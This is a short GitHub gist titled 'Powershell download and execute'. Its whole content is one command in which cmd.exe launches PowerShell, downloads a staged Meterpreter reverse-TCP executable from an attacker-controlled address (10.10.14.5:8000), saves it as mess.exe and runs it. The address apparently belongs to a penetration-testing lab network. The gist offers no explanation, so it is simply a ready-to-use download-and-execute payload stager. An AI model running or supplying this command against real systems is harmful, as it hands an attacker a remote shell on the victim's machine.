Skip to content

Instantly share code, notes, and snippets.

@castexyz
Created March 18, 2018 10:07
Show Gist options
  • Save castexyz/f79a9c0e77d855b1420a929ef8dc5bbf to your computer and use it in GitHub Desktop.
Save castexyz/f79a9c0e77d855b1420a929ef8dc5bbf to your computer and use it in GitHub Desktop.
Powershell download and execute
cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://10.10.14.5:8000/windows-meterpreter-staged-reverse-tcp-9877.exe','mess.exe');Start-Process 'mess.exe'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment